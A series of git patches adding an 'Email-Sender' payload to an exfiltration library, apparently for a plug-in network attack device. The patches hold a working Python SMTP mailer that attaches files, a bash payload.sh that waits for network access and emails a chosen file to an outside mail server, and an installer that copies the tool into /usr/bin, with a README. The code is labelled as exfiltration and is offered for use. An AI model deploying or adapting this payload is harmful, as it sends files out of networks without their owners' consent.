From a277a4493b041b5012e0b95eb68edcb384be855c Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 12:43:20 +0000 Subject: [PATCH 01/21] Lets Send Packages Of Nuts ! Here is my extension for sending emails; also includes sending files and html format. --- payloads/extensions/sendemail.py | 72 ++++++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 payloads/extensions/sendemail.py diff --git a/payloads/extensions/sendemail.py b/payloads/extensions/sendemail.py new file mode 100644 index 0000000..0cf3fd7 --- /dev/null +++ b/payloads/extensions/sendemail.py @@ -0,0 +1,72 @@ +import smtplib, os +from email.MIMEMultipart import MIMEMultipart +from email.MIMEBase import MIMEBase +from email.MIMEText import MIMEText +from email.MIMEImage import MIMEImage +from email.Utils import COMMASPACE, formatdate +from email import Encoders +import ConfigParser + +def send_mail(send_from, send_to, subject, text, files=None, + data_attachments=None, server="None", port=587, + tls=True, html=False, images=None, + username=None, password=None, + config_file=None, config=None): + + if files is None: + files = [] + + if images is None: + images = [] + + if data_attachments is None: + data_attachments = [] + + if config_file is not None: + config = ConfigParser.ConfigParser() + config.read(config_file) + + if config is not None: + server = config.get('smtp', 'server') + port = config.get('smtp', 'port') + tls = config.get('smtp', 'tls').lower() in ('true', 'yes', 'y') + username = config.get('smtp', 'username') + password = config.get('smtp', 'password') + + msg = MIMEMultipart('related') + msg['From'] = send_from + msg['To'] = send_to if isinstance(send_to, basestring) else COMMASPACE.join(send_to) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + + msg.attach( MIMEText(text, 'html' if html else 'plain') ) + + for f in files: + part = MIMEBase('application', "octet-stream") + part.set_payload( open(f,"rb").read() ) + Encoders.encode_base64(part) + part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(f)) + msg.attach(part) + + for f in data_attachments: + part = MIMEBase('application', "octet-stream") + part.set_payload( f['data'] ) + Encoders.encode_base64(part) + part.add_header('Content-Disposition', 'attachment; filename="%s"' % f['filename']) + msg.attach(part) + + for (n, i) in enumerate(images): + fp = open(i, 'rb') + msgImage = MIMEImage(fp.read()) + fp.close() + msgImage.add_header('Content-ID', ''.format(str(n+1))) + msg.attach(msgImage) + + smtp = smtplib.SMTP(server, int(port)) + if tls: + smtp.starttls() + + if username is not None: + smtp.login(username, password) + smtp.sendmail(send_from, send_to, msg.as_string()) + smtp.close() From 9339c283218f74d36816f1f16bc3ca94141c53d7 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 12:49:48 +0000 Subject: [PATCH 02/21] Sending Emails This is an example the call the libraries make to the extension to send the mail. --- payloads/library/exfiltration/Email-Sender/sendmail.py | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 payloads/library/exfiltration/Email-Sender/sendmail.py diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py new file mode 100644 index 0000000..4064485 --- /dev/null +++ b/payloads/library/exfiltration/Email-Sender/sendmail.py @@ -0,0 +1,9 @@ +import sys +sys.path.append("/root/extensions") +from sendemail.py import send_mail + +send_mail('im-just-a-squirrel@giving-you-my-nuts.net', 'EmailTo@SendTo.net', + 'You Got My Nuts', + 'Enjoy this package', + files=["/Path/To/My/Nuts.txt"], + server='MAIL.SERVER.com', username='USERNAME', password='PASSWORD') From bb9a6ade58a1342d8d70c4dfc0a0bc67e0421abf Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 12:56:08 +0000 Subject: [PATCH 03/21] Update sendmail.py --- payloads/library/exfiltration/Email-Sender/sendmail.py | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py index 4064485..04c8e1e 100644 --- a/payloads/library/exfiltration/Email-Sender/sendmail.py +++ b/payloads/library/exfiltration/Email-Sender/sendmail.py @@ -1,3 +1,11 @@ +# Title: Email-Sender +# Description: Allows sending emails to a mail server, with file support +# this is used coupled with the extension +# Author: TheDragonkeeper +# Version: 1.0 +# Category: exfiltration +# Target: Any + import sys sys.path.append("/root/extensions") from sendemail.py import send_mail From c15d894b0adbebaeb7ec89273a90ee874bc6c746 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 12:57:20 +0000 Subject: [PATCH 04/21] Update sendemail.py --- payloads/extensions/sendemail.py | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/payloads/extensions/sendemail.py b/payloads/extensions/sendemail.py index 0cf3fd7..c26d45f 100644 --- a/payloads/extensions/sendemail.py +++ b/payloads/extensions/sendemail.py @@ -1,3 +1,11 @@ +# Title: Email-Sender +# Description: Allows sending emails to a mail server, with file support +# this is called using the Email-Sender library +# Author: TheDragonkeeper +# Version: 1.0 +# Category: exfiltration +# Target: Any + import smtplib, os from email.MIMEMultipart import MIMEMultipart from email.MIMEBase import MIMEBase From 386f4e58aff5b811742de792a9918f936ef09fd0 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 13:18:11 +0000 Subject: [PATCH 05/21] whoops --- payloads/library/exfiltration/Email-Sender/sendmail.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py index 04c8e1e..d209d31 100644 --- a/payloads/library/exfiltration/Email-Sender/sendmail.py +++ b/payloads/library/exfiltration/Email-Sender/sendmail.py @@ -8,7 +8,7 @@ import sys sys.path.append("/root/extensions") -from sendemail.py import send_mail +from sendemail import send_mail send_mail('im-just-a-squirrel@giving-you-my-nuts.net', 'EmailTo@SendTo.net', 'You Got My Nuts', From 8f434d2dab27d5b89a0c705bdb483a501157a9ff Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 15:56:40 +0000 Subject: [PATCH 06/21] Made changes so python can take bash parameters --- .../exfiltration/Email-Sender/sendmail.py | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py index d209d31..8033319 100644 --- a/payloads/library/exfiltration/Email-Sender/sendmail.py +++ b/payloads/library/exfiltration/Email-Sender/sendmail.py @@ -1,17 +1,19 @@ -# Title: Email-Sender +# Title: Email-Sender # Description: Allows sending emails to a mail server, with file support -# this is used coupled with the extension -# Author: TheDragonkeeper -# Version: 1.0 +# this is used coupled with the extension +# Author: TheDragonkeeper +# Version: 1.0 # Category: exfiltration -# Target: Any +# Target: Any + import sys sys.path.append("/root/extensions") from sendemail import send_mail -send_mail('im-just-a-squirrel@giving-you-my-nuts.net', 'EmailTo@SendTo.net', - 'You Got My Nuts', - 'Enjoy this package', - files=["/Path/To/My/Nuts.txt"], - server='MAIL.SERVER.com', username='USERNAME', password='PASSWORD') +send_mail(sys.argv[1], sys.argv[2], + sys.argv[3], + sys.argv[4], +# files=sys.argv[8], + server=sys.argv[5], username=sys.argv[6], password=sys.argv[7]) +) From bb175fc269f63ecf0c2366d8c929cccf61bbcf4a Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 16:00:57 +0000 Subject: [PATCH 07/21] Example of sending email with bash variables --- .../exfiltration/Email-Sender/payload.sh | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 payloads/library/exfiltration/Email-Sender/payload.sh diff --git a/payloads/library/exfiltration/Email-Sender/payload.sh b/payloads/library/exfiltration/Email-Sender/payload.sh new file mode 100644 index 0000000..bb007e1 --- /dev/null +++ b/payloads/library/exfiltration/Email-Sender/payload.sh @@ -0,0 +1,17 @@ +function run() { + LED STAGE1 + SWITCH_POS=$(SWITCH) + until ping -c 1 8.8.8.8 >/dev/null ; do : ; done + SUBJECT='Im Just Nutty' + BODY='And your network is nutty too.' + RCPT="recieving email" + FROM="your email" + SERVER="server.com" + USER="username" + PASS="password" + python /root/payloads/$SWITCH_POS/sendmail.py $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS + LED FINISH +} + +NETMODE NAT +run From d9d1117d82877f5b18c35fc5c06bbe8ce72aa4ca Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 16:08:44 +0000 Subject: [PATCH 08/21] Create README.md --- .../library/exfiltration/Email-Sender/README.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 payloads/library/exfiltration/Email-Sender/README.md diff --git a/payloads/library/exfiltration/Email-Sender/README.md b/payloads/library/exfiltration/Email-Sender/README.md new file mode 100644 index 0000000..4f62cc3 --- /dev/null +++ b/payloads/library/exfiltration/Email-Sender/README.md @@ -0,0 +1,13 @@ +| | | +|:----------------|:---------------------------------------------------------------------------------------------------| +| **Title** | Email-Sender | +| **Description** | Sends emails / has html and file support / it can be used with bash and python . | + **Author** | TheDragonkeeper | +| **Version** | 1.0 | +| **Category** | Exfiltration | +| **Target** | Any | + +| Meaning | Color | Description | +|:----------|:-----------------:|:----------------------------| +| SUCCESS: | Blink Green | Payload ended complete | +| SETUP: | Blink Yellow | Payload is waiting on network | From 95c54d273949c582898298cbc8c817dddaa27da4 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 16:34:35 +0000 Subject: [PATCH 09/21] workaround for bash sending file --- payloads/library/exfiltration/Email-Sender/sendmail.py | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py index 8033319..b26e7e8 100644 --- a/payloads/library/exfiltration/Email-Sender/sendmail.py +++ b/payloads/library/exfiltration/Email-Sender/sendmail.py @@ -11,9 +11,13 @@ import sys sys.path.append("/root/extensions") from sendemail import send_mail -send_mail(sys.argv[1], sys.argv[2], +if len(sys.argv) > 8: + send_mail(sys.argv[1], sys.argv[2], + sys.argv[3], + sys.argv[4], + server=sys.argv[5], username=sys.argv[6], password=sys.argv[7], files=[sys.argv[8]]) +else: + send_mail(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], -# files=sys.argv[8], server=sys.argv[5], username=sys.argv[6], password=sys.argv[7]) -) From e278b53fa1e2ce2d137252d6f1253681c40d26ff Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Sat, 4 Nov 2017 16:40:13 +0000 Subject: [PATCH 10/21] Update payload.sh --- payloads/library/exfiltration/Email-Sender/payload.sh | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Email-Sender/payload.sh b/payloads/library/exfiltration/Email-Sender/payload.sh index bb007e1..d978275 100644 --- a/payloads/library/exfiltration/Email-Sender/payload.sh +++ b/payloads/library/exfiltration/Email-Sender/payload.sh @@ -9,7 +9,9 @@ function run() { SERVER="server.com" USER="username" PASS="password" - python /root/payloads/$SWITCH_POS/sendmail.py $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS + FILE="/some/File/Path/1.txt" + python /root/payloads/$SWITCH_POS/sendmail.py $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" + ####### REMOVE THE FILE VAR FROM THE PYTHON COMMAND IF YOU HAVE NO PATH LED FINISH } From 66bd94489babd04b8f8eef3246c00202aeb729ae Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 22:46:07 +0000 Subject: [PATCH 11/21] Update sendemail.py --- payloads/extensions/sendemail.py | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/payloads/extensions/sendemail.py b/payloads/extensions/sendemail.py index c26d45f..299d261 100644 --- a/payloads/extensions/sendemail.py +++ b/payloads/extensions/sendemail.py @@ -5,7 +5,7 @@ # Version: 1.0 # Category: exfiltration # Target: Any - +import sys import smtplib, os from email.MIMEMultipart import MIMEMultipart from email.MIMEBase import MIMEBase @@ -78,3 +78,15 @@ def send_mail(send_from, send_to, subject, text, files=None, smtp.login(username, password) smtp.sendmail(send_from, send_to, msg.as_string()) smtp.close() + + +if len(sys.argv) > 8: + send_mail(sys.argv[1], sys.argv[2], + sys.argv[3], + sys.argv[4], + server=sys.argv[5], username=sys.argv[6], password=sys.argv[7], files=[sys.argv[8]]) +else: + send_mail(sys.argv[1], sys.argv[2], + sys.argv[3], + sys.argv[4], +server=sys.argv[5], username=sys.argv[6], password=sys.argv[7]) From 67615c5b59497c32480be8b6e7c0bdbe03ccb815 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 22:47:28 +0000 Subject: [PATCH 12/21] Rename payloads/extensions/sendemail.py to payloads/library/exfiltration/Email-Sender/sendemail.py --- .../exfiltration/Email-Sender}/sendemail.py | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/{extensions => library/exfiltration/Email-Sender}/sendemail.py (100%) diff --git a/payloads/extensions/sendemail.py b/payloads/library/exfiltration/Email-Sender/sendemail.py similarity index 100% rename from payloads/extensions/sendemail.py rename to payloads/library/exfiltration/Email-Sender/sendemail.py From 06636402fdafb9abc953ad2ad91d53e0439d8159 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 22:47:45 +0000 Subject: [PATCH 13/21] Delete sendmail.py --- .../exfiltration/Email-Sender/sendmail.py | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 payloads/library/exfiltration/Email-Sender/sendmail.py diff --git a/payloads/library/exfiltration/Email-Sender/sendmail.py b/payloads/library/exfiltration/Email-Sender/sendmail.py deleted file mode 100644 index b26e7e8..0000000 --- a/payloads/library/exfiltration/Email-Sender/sendmail.py +++ /dev/null @@ -1,23 +0,0 @@ -# Title: Email-Sender -# Description: Allows sending emails to a mail server, with file support -# this is used coupled with the extension -# Author: TheDragonkeeper -# Version: 1.0 -# Category: exfiltration -# Target: Any - - -import sys -sys.path.append("/root/extensions") -from sendemail import send_mail - -if len(sys.argv) > 8: - send_mail(sys.argv[1], sys.argv[2], - sys.argv[3], - sys.argv[4], - server=sys.argv[5], username=sys.argv[6], password=sys.argv[7], files=[sys.argv[8]]) -else: - send_mail(sys.argv[1], sys.argv[2], - sys.argv[3], - sys.argv[4], - server=sys.argv[5], username=sys.argv[6], password=sys.argv[7]) From dca44c372624c34ee10673489330436df7c1acfe Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 22:58:21 +0000 Subject: [PATCH 14/21] Create SENDMAIL --- payloads/library/exfiltration/Email-Sender/SENDMAIL | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 payloads/library/exfiltration/Email-Sender/SENDMAIL diff --git a/payloads/library/exfiltration/Email-Sender/SENDMAIL b/payloads/library/exfiltration/Email-Sender/SENDMAIL new file mode 100644 index 0000000..f8228f1 --- /dev/null +++ b/payloads/library/exfiltration/Email-Sender/SENDMAIL @@ -0,0 +1,2 @@ +[[ -z $8 ]] && python /usr/bin/sendemail.py "$1" "$2" "$3" "$4" "$5" "$6" "$7" +[[ ! -z $8 ]] && python /usr/bin/sendemail.py "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" From c8fb34d29e2b8062abfff3e4b1af5cfd905c5112 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:03:13 +0000 Subject: [PATCH 15/21] Create install --- payloads/library/exfiltration/Email-Sender/install | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 payloads/library/exfiltration/Email-Sender/install diff --git a/payloads/library/exfiltration/Email-Sender/install b/payloads/library/exfiltration/Email-Sender/install new file mode 100644 index 0000000..4d223b0 --- /dev/null +++ b/payloads/library/exfiltration/Email-Sender/install @@ -0,0 +1,7 @@ +#!/bin/bash + +if [ ! -f /usr/bin/SENDMAIL ]; then + mv sendemail.py /usr/bin/ + mv SENDMAIL /usr/bin/ + chmod +rx /usr/bin/SENDMAIL +fi From 349d442f5bc41f13f8a72302698ee529b2f654d8 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:05:11 +0000 Subject: [PATCH 16/21] Update SENDMAIL --- payloads/library/exfiltration/Email-Sender/SENDMAIL | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/payloads/library/exfiltration/Email-Sender/SENDMAIL b/payloads/library/exfiltration/Email-Sender/SENDMAIL index f8228f1..85224a7 100644 --- a/payloads/library/exfiltration/Email-Sender/SENDMAIL +++ b/payloads/library/exfiltration/Email-Sender/SENDMAIL @@ -1,2 +1,7 @@ +#!/bin/bash + [[ -z $8 ]] && python /usr/bin/sendemail.py "$1" "$2" "$3" "$4" "$5" "$6" "$7" [[ ! -z $8 ]] && python /usr/bin/sendemail.py "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" + +### $1 $2 $3 $4 $5 $6 $7 $8 +### $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" From bfd5d2a29ddfb4d6ddf60dd1282900295f0ae88b Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:07:08 +0000 Subject: [PATCH 17/21] Update payload.sh --- payloads/library/exfiltration/Email-Sender/payload.sh | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Email-Sender/payload.sh b/payloads/library/exfiltration/Email-Sender/payload.sh index d978275..de95f00 100644 --- a/payloads/library/exfiltration/Email-Sender/payload.sh +++ b/payloads/library/exfiltration/Email-Sender/payload.sh @@ -1,3 +1,5 @@ +#!/bin/bash + function run() { LED STAGE1 SWITCH_POS=$(SWITCH) @@ -10,10 +12,17 @@ function run() { USER="username" PASS="password" FILE="/some/File/Path/1.txt" - python /root/payloads/$SWITCH_POS/sendmail.py $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" + SENDMAIL $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" ####### REMOVE THE FILE VAR FROM THE PYTHON COMMAND IF YOU HAVE NO PATH LED FINISH } + +if [ ! -f /usr/bin/SENDMAIL ]; then + mv sendemail.py /usr/bin/ + mv SENDMAIL /usr/bin/ + chmod +rx /usr/bin/SENDMAIL +fi + NETMODE NAT run From fd4fc8147de540026c936401abf64b9cfdda9871 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:07:20 +0000 Subject: [PATCH 18/21] Delete install --- payloads/library/exfiltration/Email-Sender/install | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 payloads/library/exfiltration/Email-Sender/install diff --git a/payloads/library/exfiltration/Email-Sender/install b/payloads/library/exfiltration/Email-Sender/install deleted file mode 100644 index 4d223b0..0000000 --- a/payloads/library/exfiltration/Email-Sender/install +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -if [ ! -f /usr/bin/SENDMAIL ]; then - mv sendemail.py /usr/bin/ - mv SENDMAIL /usr/bin/ - chmod +rx /usr/bin/SENDMAIL -fi From 4f3c8d5e5504755830d621d4c80849fda95510b4 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:23:44 +0000 Subject: [PATCH 19/21] Updated to run from /usr/bin --- .../exfiltration/Email-Sender/README.md | 24 ++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Email-Sender/README.md b/payloads/library/exfiltration/Email-Sender/README.md index 4f62cc3..e3b598b 100644 --- a/payloads/library/exfiltration/Email-Sender/README.md +++ b/payloads/library/exfiltration/Email-Sender/README.md @@ -3,7 +3,7 @@ | **Title** | Email-Sender | | **Description** | Sends emails / has html and file support / it can be used with bash and python . | **Author** | TheDragonkeeper | -| **Version** | 1.0 | +| **Version** | 1.1 | | **Category** | Exfiltration | | **Target** | Any | @@ -11,3 +11,25 @@ |:----------|:-----------------:|:----------------------------| | SUCCESS: | Blink Green | Payload ended complete | | SETUP: | Blink Yellow | Payload is waiting on network | + +| Command | Arguments | +:----------|:-----------------| +| SENDMAIL | $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" | + + +Running the payload will install the command to /usr/bin +this will allow you to use the command SENDMAIL to send an email using your bash payload +the default arguments are as follows. + + + +| $1 | $2 | $3 | $4 | $5 | $6 | $7 | $8 +|:----------|:----------|:-----------------|:----------|:----------|:-----------------|:----------|:-----------------:| +| $FROM |$RCPT |"$SUBJECT"| "$BODY"| $SERVER | $USER | $PASS |"$FILE" | + + +if you wish to hard code one of these values you can simply edit the SENDMAIL file and then drop the numbers down a value; +i.e if you change $1 to 'thisismyemail@somedomain.net' then $2 now needs to be $1 + +The other option is to edit the python file 'sendemail.py' and change the corresponding sys.argv[1] in the same way. +but then you need to make sure you also edit the SENDMAIL to only send the amount of arguments needed. From ad23510242307ead64e13ad5cce1cd61190453b1 Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:25:57 +0000 Subject: [PATCH 20/21] Update payload.sh --- payloads/library/exfiltration/Email-Sender/payload.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/Email-Sender/payload.sh b/payloads/library/exfiltration/Email-Sender/payload.sh index de95f00..0418657 100644 --- a/payloads/library/exfiltration/Email-Sender/payload.sh +++ b/payloads/library/exfiltration/Email-Sender/payload.sh @@ -19,8 +19,8 @@ function run() { if [ ! -f /usr/bin/SENDMAIL ]; then - mv sendemail.py /usr/bin/ - mv SENDMAIL /usr/bin/ + mv /root/payloads/$(SWITCH)/sendemail.py /usr/bin/ + mv /root/payloads/$(SWITCH)/SENDMAIL /usr/bin/ chmod +rx /usr/bin/SENDMAIL fi From 8615e340fc1eca616ffc4e872f10ce93497e80cd Mon Sep 17 00:00:00 2001 From: TheDragonkeeper Date: Tue, 7 Nov 2017 23:27:51 +0000 Subject: [PATCH 21/21] Update sendemail.py --- payloads/library/exfiltration/Email-Sender/sendemail.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Email-Sender/sendemail.py b/payloads/library/exfiltration/Email-Sender/sendemail.py index 299d261..5285a11 100644 --- a/payloads/library/exfiltration/Email-Sender/sendemail.py +++ b/payloads/library/exfiltration/Email-Sender/sendemail.py @@ -2,7 +2,7 @@ # Description: Allows sending emails to a mail server, with file support # this is called using the Email-Sender library # Author: TheDragonkeeper -# Version: 1.0 +# Version: 1.1 # Category: exfiltration # Target: Any import sys